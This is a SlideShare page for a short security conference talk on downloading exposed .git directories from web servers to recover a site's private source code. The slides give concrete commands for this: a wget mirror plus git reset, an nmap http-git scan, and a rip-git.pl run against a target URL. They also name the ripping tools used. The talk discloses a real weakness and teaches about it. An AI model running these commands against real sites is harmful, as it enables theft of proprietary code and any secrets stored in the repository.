SlideShare une entreprise Scribd logo

Ripping web accessible .git files

Télécharger en tant que ODP, PDF
V
Vlatko Kosturjak

Ripping web accessible .git files (or how to get the source when its not open source)

1  sur  13
#OpenFest Ripping web accessible .git files (or how to get the source when its not open source) Vlatko Kosturjak, Diverto https://twitter.com/k0st
Agenda ● Introduction ● Finding repos ● Cloning them ● How to get the source when its not open source ● How to Profit 5 minutes
You found .git?
Want source? ● Get the repo: mkdir git-test cd git-test wget --mirror --include-directories=/.git http://www.target.com/.git ● Get files cd www.target.com git reset --hard ● Profit! http://www.skullsecurity.org/blog/2012/using-git-clone-to-get-pwn3d
Problem Directory browsing disabled
No tool available to detect ● Most of the web/network scanners will not find this ● No awareness ● Tools looks only this ● .git/ => 403 ● They should actually look ● .git/logs/HEAD => 200 ● .git/config => 200 ● .git/index => 200 ● ...
Nmap NSE comes to rescue ● Have to use latest SVN version ● Script is not in 6.01 ● It looks all relevant git files ● .git/logs/HEAD ● .git/config ● ... ● nmap -sS -PS80,81,443,8080,8081 -p80,81,443,8080,8081 --script=http-git <target> PORT STATE SERVICE 80/tcp open http | http-git: | Potential Git repository found at XX.XX.XX.XX:XX/.git/ (found 5 of 6 expected files)
DVCS-Pillage ● It will rip the .git files when directory browsing disabled ● By Adam Baldwin ● Accessible from URL: ● https://github.com/evilpacket/DVCS-Pillage ● Have few problems ● Hmm...
Problems... ● Current methods ● Not complete tree download method – Packed refs – git ls-files –stage method ● No support for branches ● No support for other than http ● Time to code my own tool ● Want whole tree ● Branches ● Support old protocols
DVCS-rip ● It will rip the .git files when directory browsing disabled ● It will rip ALL files and checkout repository for you ● Not partial ● git fsck trick ● Support for ● Branches ● Any protocol (http/https/...) ● Accessible from URL: ● https://github.com/kost/dvcs-ripper
DVCS-rip ● How to run? ● Example run: ● rip-git.pl -v -u http://www.example.com/.git/ ● It will automatically do "git checkout -f" ● Profit!
Evolving Good example of open source collaboration between projects
Questions? Comments? Feedbacks? @k0st This is zero Acknowledgements: Adam Baldwin, Ron Bowes, Alex Weber, ...

Recommandé

Wonderful world of (distributed) SCM or VCS
Wonderful world of (distributed) SCM or VCSWonderful world of (distributed) SCM or VCS
Wonderful world of (distributed) SCM or VCSVlatko Kosturjak
 
Porting your favourite cmdline tool to Android
Porting your favourite cmdline tool to AndroidPorting your favourite cmdline tool to Android
Porting your favourite cmdline tool to AndroidVlatko Kosturjak
 
RootedCON 2017 - Docker might not be your friend. Trojanizing Docker images
RootedCON 2017 - Docker might not be your friend. Trojanizing Docker imagesRootedCON 2017 - Docker might not be your friend. Trojanizing Docker images
RootedCON 2017 - Docker might not be your friend. Trojanizing Docker imagesDaniel Garcia (a.k.a cr0hn)
 
COSCUP 2016 - ROS + Gazebo機器人模擬器工作坊
COSCUP 2016 - ROS + Gazebo機器人模擬器工作坊COSCUP 2016 - ROS + Gazebo機器人模擬器工作坊
COSCUP 2016 - ROS + Gazebo機器人模擬器工作坊Po-Jen Lai
 
about Debian "squeeze" @201002 OSC Tokyospring
about Debian "squeeze" @201002 OSC Tokyospringabout Debian "squeeze" @201002 OSC Tokyospring
about Debian "squeeze" @201002 OSC TokyospringHideki Yamane
 
Local Community for Debian (2013 Taiwan miniDebConf)
Local Community for Debian (2013 Taiwan miniDebConf)Local Community for Debian (2013 Taiwan miniDebConf)
Local Community for Debian (2013 Taiwan miniDebConf)Hideki Yamane
 
Golang workshop
Golang workshopGolang workshop
Golang workshopVictor S. Recio
 
Package manages and Puppet - PuppetConf 2015
Package manages and Puppet - PuppetConf 2015Package manages and Puppet - PuppetConf 2015
Package manages and Puppet - PuppetConf 2015ice799
 

Recommandé

Wonderful world of (distributed) SCM or VCS
Wonderful world of (distributed) SCM or VCSWonderful world of (distributed) SCM or VCS
Wonderful world of (distributed) SCM or VCSVlatko Kosturjak
 
Porting your favourite cmdline tool to Android
Porting your favourite cmdline tool to AndroidPorting your favourite cmdline tool to Android
Porting your favourite cmdline tool to AndroidVlatko Kosturjak
 
RootedCON 2017 - Docker might not be your friend. Trojanizing Docker images
RootedCON 2017 - Docker might not be your friend. Trojanizing Docker imagesRootedCON 2017 - Docker might not be your friend. Trojanizing Docker images
RootedCON 2017 - Docker might not be your friend. Trojanizing Docker imagesDaniel Garcia (a.k.a cr0hn)
 
COSCUP 2016 - ROS + Gazebo機器人模擬器工作坊
COSCUP 2016 - ROS + Gazebo機器人模擬器工作坊COSCUP 2016 - ROS + Gazebo機器人模擬器工作坊
COSCUP 2016 - ROS + Gazebo機器人模擬器工作坊Po-Jen Lai
 
about Debian "squeeze" @201002 OSC Tokyospring
about Debian "squeeze" @201002 OSC Tokyospringabout Debian "squeeze" @201002 OSC Tokyospring
about Debian "squeeze" @201002 OSC TokyospringHideki Yamane
 
Local Community for Debian (2013 Taiwan miniDebConf)
Local Community for Debian (2013 Taiwan miniDebConf)Local Community for Debian (2013 Taiwan miniDebConf)
Local Community for Debian (2013 Taiwan miniDebConf)Hideki Yamane
 
Golang workshop
Golang workshopGolang workshop
Golang workshopVictor S. Recio
 
Package manages and Puppet - PuppetConf 2015
Package manages and Puppet - PuppetConf 2015Package manages and Puppet - PuppetConf 2015
Package manages and Puppet - PuppetConf 2015ice799
 
Desarrollo web backend: Spring Boot, MongoDB y Azure
Desarrollo web backend: Spring Boot, MongoDB y AzureDesarrollo web backend: Spring Boot, MongoDB y Azure
Desarrollo web backend: Spring Boot, MongoDB y AzurePatxi Gortázar
 
Puppet Camp LA 2/19/2015
Puppet Camp LA 2/19/2015Puppet Camp LA 2/19/2015
Puppet Camp LA 2/19/2015ice799
 
Does Cowgirl Dream of Red Swirl?
Does Cowgirl Dream of Red Swirl?Does Cowgirl Dream of Red Swirl?
Does Cowgirl Dream of Red Swirl?Hideki Yamane
 
Chef Conf 2015: Package Management & Chef
Chef Conf 2015: Package Management & ChefChef Conf 2015: Package Management & Chef
Chef Conf 2015: Package Management & Chefice799
 
A Look at Command Line Swift
A Look at Command Line SwiftA Look at Command Line Swift
A Look at Command Line SwiftJoshuaKaplan22
 
CloudOpen North America 2013: Vagrant & CFEngine
CloudOpen North America 2013: Vagrant & CFEngineCloudOpen North America 2013: Vagrant & CFEngine
CloudOpen North America 2013: Vagrant & CFEngineNick Anderson
 
find & improve some bottleneck in Debian project (DebConf14 LT)
find & improve some bottleneck in Debian project (DebConf14 LT)find & improve some bottleneck in Debian project (DebConf14 LT)
find & improve some bottleneck in Debian project (DebConf14 LT)Hideki Yamane
 
SouthEast LinuxFest 2015 - intro to git
SouthEast LinuxFest 2015 - intro to gitSouthEast LinuxFest 2015 - intro to git
SouthEast LinuxFest 2015 - intro to gitedgester
 
Chromium OS Introduction
Chromium OS IntroductionChromium OS Introduction
Chromium OS IntroductionWei-Ning Huang
 
8-9-10=Jessie,Stretch,Buster
8-9-10=Jessie,Stretch,Buster8-9-10=Jessie,Stretch,Buster
8-9-10=Jessie,Stretch,BusterHideki Yamane
 
Open source applications softwares
Open source applications softwaresOpen source applications softwares
Open source applications softwaresTushar B Kute
 
Drupal Development : Tools, Tips, and Tricks
Drupal Development : Tools, Tips, and TricksDrupal Development : Tools, Tips, and Tricks
Drupal Development : Tools, Tips, and TricksGerald Villorente
 
OpenStack Swift on virtualbox
OpenStack Swift on virtualboxOpenStack Swift on virtualbox
OpenStack Swift on virtualboxAtul Jha
 
Docker on Windows
Docker on WindowsDocker on Windows
Docker on WindowsCarl Su
 
Docker & PHP - Practical use case
Docker & PHP - Practical use caseDocker & PHP - Practical use case
Docker & PHP - Practical use caserjsmelo
 
Null Xposed Framework internals and writing modules
Null Xposed Framework internals and writing modulesNull Xposed Framework internals and writing modules
Null Xposed Framework internals and writing modulesAbhinav Chourasia, GMOB
 
Cape Cod Web Technology Meetup - 3
Cape Cod Web Technology Meetup - 3Cape Cod Web Technology Meetup - 3
Cape Cod Web Technology Meetup - 3Asher Martin
 
WAF protections and bypass resources
WAF protections and bypass resourcesWAF protections and bypass resources
WAF protections and bypass resourcesAntonio Costa aka Cooler_
 
Openwrt startup
Openwrt startupOpenwrt startup
Openwrt startup晓东 杜
 
Docker italia fatti un container tutto tuo
Docker italia fatti un container tutto tuoDocker italia fatti un container tutto tuo
Docker italia fatti un container tutto tuoGiulio De Donato
 
Creative accounting (1)
Creative accounting (1)Creative accounting (1)
Creative accounting (1)Urvi Patel
 
Creative accounting tutor master
Creative accounting tutor masterCreative accounting tutor master
Creative accounting tutor masterSako Mwakalobo
 

Contenu connexe

Tendances

Desarrollo web backend: Spring Boot, MongoDB y Azure
Desarrollo web backend: Spring Boot, MongoDB y AzureDesarrollo web backend: Spring Boot, MongoDB y Azure
Desarrollo web backend: Spring Boot, MongoDB y AzurePatxi Gortázar
 
Puppet Camp LA 2/19/2015
Puppet Camp LA 2/19/2015Puppet Camp LA 2/19/2015
Puppet Camp LA 2/19/2015ice799
 
Does Cowgirl Dream of Red Swirl?
Does Cowgirl Dream of Red Swirl?Does Cowgirl Dream of Red Swirl?
Does Cowgirl Dream of Red Swirl?Hideki Yamane
 
Chef Conf 2015: Package Management & Chef
Chef Conf 2015: Package Management & ChefChef Conf 2015: Package Management & Chef
Chef Conf 2015: Package Management & Chefice799
 
A Look at Command Line Swift
A Look at Command Line SwiftA Look at Command Line Swift
A Look at Command Line SwiftJoshuaKaplan22
 
CloudOpen North America 2013: Vagrant & CFEngine
CloudOpen North America 2013: Vagrant & CFEngineCloudOpen North America 2013: Vagrant & CFEngine
CloudOpen North America 2013: Vagrant & CFEngineNick Anderson
 
find & improve some bottleneck in Debian project (DebConf14 LT)
find & improve some bottleneck in Debian project (DebConf14 LT)find & improve some bottleneck in Debian project (DebConf14 LT)
find & improve some bottleneck in Debian project (DebConf14 LT)Hideki Yamane
 
SouthEast LinuxFest 2015 - intro to git
SouthEast LinuxFest 2015 - intro to gitSouthEast LinuxFest 2015 - intro to git
SouthEast LinuxFest 2015 - intro to gitedgester
 
Chromium OS Introduction
Chromium OS IntroductionChromium OS Introduction
Chromium OS IntroductionWei-Ning Huang
 
8-9-10=Jessie,Stretch,Buster
8-9-10=Jessie,Stretch,Buster8-9-10=Jessie,Stretch,Buster
8-9-10=Jessie,Stretch,BusterHideki Yamane
 
Open source applications softwares
Open source applications softwaresOpen source applications softwares
Open source applications softwaresTushar B Kute
 
Drupal Development : Tools, Tips, and Tricks
Drupal Development : Tools, Tips, and TricksDrupal Development : Tools, Tips, and Tricks
Drupal Development : Tools, Tips, and TricksGerald Villorente
 
OpenStack Swift on virtualbox
OpenStack Swift on virtualboxOpenStack Swift on virtualbox
OpenStack Swift on virtualboxAtul Jha
 
Docker on Windows
Docker on WindowsDocker on Windows
Docker on WindowsCarl Su
 
Docker & PHP - Practical use case
Docker & PHP - Practical use caseDocker & PHP - Practical use case
Docker & PHP - Practical use caserjsmelo
 
Null Xposed Framework internals and writing modules
Null Xposed Framework internals and writing modulesNull Xposed Framework internals and writing modules
Null Xposed Framework internals and writing modulesAbhinav Chourasia, GMOB
 
Cape Cod Web Technology Meetup - 3
Cape Cod Web Technology Meetup - 3Cape Cod Web Technology Meetup - 3
Cape Cod Web Technology Meetup - 3Asher Martin
 
Openwrt startup
Openwrt startupOpenwrt startup
Openwrt startup晓东 杜
 
Docker italia fatti un container tutto tuo
Docker italia fatti un container tutto tuoDocker italia fatti un container tutto tuo
Docker italia fatti un container tutto tuoGiulio De Donato
 

Tendances (20)

Desarrollo web backend: Spring Boot, MongoDB y Azure
Desarrollo web backend: Spring Boot, MongoDB y AzureDesarrollo web backend: Spring Boot, MongoDB y Azure
Desarrollo web backend: Spring Boot, MongoDB y Azure
 
Puppet Camp LA 2/19/2015
Puppet Camp LA 2/19/2015Puppet Camp LA 2/19/2015
Puppet Camp LA 2/19/2015
 
Does Cowgirl Dream of Red Swirl?
Does Cowgirl Dream of Red Swirl?Does Cowgirl Dream of Red Swirl?
Does Cowgirl Dream of Red Swirl?
 
Chef Conf 2015: Package Management & Chef
Chef Conf 2015: Package Management & ChefChef Conf 2015: Package Management & Chef
Chef Conf 2015: Package Management & Chef
 
A Look at Command Line Swift
A Look at Command Line SwiftA Look at Command Line Swift
A Look at Command Line Swift
 
CloudOpen North America 2013: Vagrant & CFEngine
CloudOpen North America 2013: Vagrant & CFEngineCloudOpen North America 2013: Vagrant & CFEngine
CloudOpen North America 2013: Vagrant & CFEngine
 
find & improve some bottleneck in Debian project (DebConf14 LT)
find & improve some bottleneck in Debian project (DebConf14 LT)find & improve some bottleneck in Debian project (DebConf14 LT)
find & improve some bottleneck in Debian project (DebConf14 LT)
 
SouthEast LinuxFest 2015 - intro to git
SouthEast LinuxFest 2015 - intro to gitSouthEast LinuxFest 2015 - intro to git
SouthEast LinuxFest 2015 - intro to git
 
Chromium OS Introduction
Chromium OS IntroductionChromium OS Introduction
Chromium OS Introduction
 
8-9-10=Jessie,Stretch,Buster
8-9-10=Jessie,Stretch,Buster8-9-10=Jessie,Stretch,Buster
8-9-10=Jessie,Stretch,Buster
 
Open source applications softwares
Open source applications softwaresOpen source applications softwares
Open source applications softwares
 
Drupal Development : Tools, Tips, and Tricks
Drupal Development : Tools, Tips, and TricksDrupal Development : Tools, Tips, and Tricks
Drupal Development : Tools, Tips, and Tricks
 
OpenStack Swift on virtualbox
OpenStack Swift on virtualboxOpenStack Swift on virtualbox
OpenStack Swift on virtualbox
 
Docker on Windows
Docker on WindowsDocker on Windows
Docker on Windows
 
Docker & PHP - Practical use case
Docker & PHP - Practical use caseDocker & PHP - Practical use case
Docker & PHP - Practical use case
 
Null Xposed Framework internals and writing modules
Null Xposed Framework internals and writing modulesNull Xposed Framework internals and writing modules
Null Xposed Framework internals and writing modules
 
Cape Cod Web Technology Meetup - 3
Cape Cod Web Technology Meetup - 3Cape Cod Web Technology Meetup - 3
Cape Cod Web Technology Meetup - 3
 
WAF protections and bypass resources
WAF protections and bypass resourcesWAF protections and bypass resources
WAF protections and bypass resources
 
Openwrt startup
Openwrt startupOpenwrt startup
Openwrt startup
 
Docker italia fatti un container tutto tuo
Docker italia fatti un container tutto tuoDocker italia fatti un container tutto tuo
Docker italia fatti un container tutto tuo
 

En vedette

Creative accounting (1)
Creative accounting (1)Creative accounting (1)
Creative accounting (1)Urvi Patel
 
Creative accounting tutor master
Creative accounting tutor masterCreative accounting tutor master
Creative accounting tutor masterSako Mwakalobo
 
Creative accounting
Creative accountingCreative accounting
Creative accountingHome Study
 
Financial Accounting
Financial AccountingFinancial Accounting
Financial Accountingashu1983
 
2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShare2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShareSlideShare
 
What to Upload to SlideShare
What to Upload to SlideShareWhat to Upload to SlideShare
What to Upload to SlideShareSlideShare
 
Getting Started With SlideShare
Getting Started With SlideShareGetting Started With SlideShare
Getting Started With SlideShareSlideShare
 

En vedette (7)

Creative accounting (1)
Creative accounting (1)Creative accounting (1)
Creative accounting (1)
 
Creative accounting tutor master
Creative accounting tutor masterCreative accounting tutor master
Creative accounting tutor master
 
Creative accounting
Creative accountingCreative accounting
Creative accounting
 
Financial Accounting
Financial AccountingFinancial Accounting
Financial Accounting
 
2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShare2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShare
 
What to Upload to SlideShare
What to Upload to SlideShareWhat to Upload to SlideShare
What to Upload to SlideShare
 
Getting Started With SlideShare
Getting Started With SlideShareGetting Started With SlideShare
Getting Started With SlideShare
 

Similaire à Ripping web accessible .git files

LasCon 2014 DevOoops
LasCon 2014 DevOoops LasCon 2014 DevOoops
LasCon 2014 DevOoops Chris Gates
 
My "Perfect" Toolchain Setup for Grails Projects
My "Perfect" Toolchain Setup for Grails ProjectsMy "Perfect" Toolchain Setup for Grails Projects
My "Perfect" Toolchain Setup for Grails ProjectsGR8Conf
 
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...Puppet
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Chris Gates
 
Why Git Sucks and you'll use it anyways
Why Git Sucks and you'll use it anywaysWhy Git Sucks and you'll use it anyways
Why Git Sucks and you'll use it anywaysCarlos Taborda
 
Introduction to Git
Introduction to GitIntroduction to Git
Introduction to GitAmit Mathur
 
Git - Some tips to do it better
Git - Some tips to do it betterGit - Some tips to do it better
Git - Some tips to do it betterJonas De Smet
 
Git - An Introduction
Git - An IntroductionGit - An Introduction
Git - An IntroductionBehzad Altaf
 
Open source projects with python
Open source projects with pythonOpen source projects with python
Open source projects with pythonroskakori
 
Getting some Git
Getting some GitGetting some Git
Getting some GitBADR
 
How to plan and define your CI-CD pipeline
How to plan and define your CI-CD pipelineHow to plan and define your CI-CD pipeline
How to plan and define your CI-CD pipelineElasTest Project
 
Git Workshop : Git On The Server
Git Workshop : Git On The ServerGit Workshop : Git On The Server
Git Workshop : Git On The ServerWildan Maulana
 
Puppet managed loadays
Puppet managed loadaysPuppet managed loadays
Puppet managed loadaysloadays
 

Similaire à Ripping web accessible .git files (20)

Git Heaven with Wakanda
Git Heaven with WakandaGit Heaven with Wakanda
Git Heaven with Wakanda
 
LasCon 2014 DevOoops
LasCon 2014 DevOoops LasCon 2014 DevOoops
LasCon 2014 DevOoops
 
My "Perfect" Toolchain Setup for Grails Projects
My "Perfect" Toolchain Setup for Grails ProjectsMy "Perfect" Toolchain Setup for Grails Projects
My "Perfect" Toolchain Setup for Grails Projects
 
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
 
Git: be social
Git: be socialGit: be social
Git: be social
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
 
Why Git Sucks and you'll use it anyways
Why Git Sucks and you'll use it anywaysWhy Git Sucks and you'll use it anyways
Why Git Sucks and you'll use it anyways
 
Git In One Evening
Git In One EveningGit In One Evening
Git In One Evening
 
Git presentation
Git presentationGit presentation
Git presentation
 
Introduction to Git
Introduction to GitIntroduction to Git
Introduction to Git
 
Git - Some tips to do it better
Git - Some tips to do it betterGit - Some tips to do it better
Git - Some tips to do it better
 
Git! Why? How?
Git! Why? How?Git! Why? How?
Git! Why? How?
 
Git - An Introduction
Git - An IntroductionGit - An Introduction
Git - An Introduction
 
Open source projects with python
Open source projects with pythonOpen source projects with python
Open source projects with python
 
Git
GitGit
Git
 
Getting some Git
Getting some GitGetting some Git
Getting some Git
 
How to plan and define your CI-CD pipeline
How to plan and define your CI-CD pipelineHow to plan and define your CI-CD pipeline
How to plan and define your CI-CD pipeline
 
Git Workshop : Git On The Server
Git Workshop : Git On The ServerGit Workshop : Git On The Server
Git Workshop : Git On The Server
 
Tizen platform-dev-tds14sh
Tizen platform-dev-tds14shTizen platform-dev-tds14sh
Tizen platform-dev-tds14sh
 
Puppet managed loadays
Puppet managed loadaysPuppet managed loadays
Puppet managed loadays
 

Ripping web accessible .git files

  • 1. #OpenFest Ripping web accessible .git files (or how to get the source when its not open source) Vlatko Kosturjak, Diverto https://twitter.com/k0st
  • 2. Agenda ● Introduction ● Finding repos ● Cloning them ● How to get the source when its not open source ● How to Profit 5 minutes
  • 4. Want source? ● Get the repo: mkdir git-test cd git-test wget --mirror --include-directories=/.git http://www.target.com/.git ● Get files cd www.target.com git reset --hard ● Profit! http://www.skullsecurity.org/blog/2012/using-git-clone-to-get-pwn3d
  • 6. No tool available to detect ● Most of the web/network scanners will not find this ● No awareness ● Tools looks only this ● .git/ => 403 ● They should actually look ● .git/logs/HEAD => 200 ● .git/config => 200 ● .git/index => 200 ● ...
  • 7. Nmap NSE comes to rescue ● Have to use latest SVN version ● Script is not in 6.01 ● It looks all relevant git files ● .git/logs/HEAD ● .git/config ● ... ● nmap -sS -PS80,81,443,8080,8081 -p80,81,443,8080,8081 --script=http-git <target> PORT STATE SERVICE 80/tcp open http | http-git: | Potential Git repository found at XX.XX.XX.XX:XX/.git/ (found 5 of 6 expected files)
  • 8. DVCS-Pillage ● It will rip the .git files when directory browsing disabled ● By Adam Baldwin ● Accessible from URL: ● https://github.com/evilpacket/DVCS-Pillage ● Have few problems ● Hmm...
  • 9. Problems... ● Current methods ● Not complete tree download method – Packed refs – git ls-files –stage method ● No support for branches ● No support for other than http ● Time to code my own tool ● Want whole tree ● Branches ● Support old protocols
  • 10. DVCS-rip ● It will rip the .git files when directory browsing disabled ● It will rip ALL files and checkout repository for you ● Not partial ● git fsck trick ● Support for ● Branches ● Any protocol (http/https/...) ● Accessible from URL: ● https://github.com/kost/dvcs-ripper
  • 11. DVCS-rip ● How to run? ● Example run: ● rip-git.pl -v -u http://www.example.com/.git/ ● It will automatically do "git checkout -f" ● Profit!
  • 12. Evolving Good example of open source collaboration between projects
  • 13. Questions? Comments? Feedbacks? @k0st This is zero Acknowledgements: Adam Baldwin, Ron Bowes, Alex Weber, ...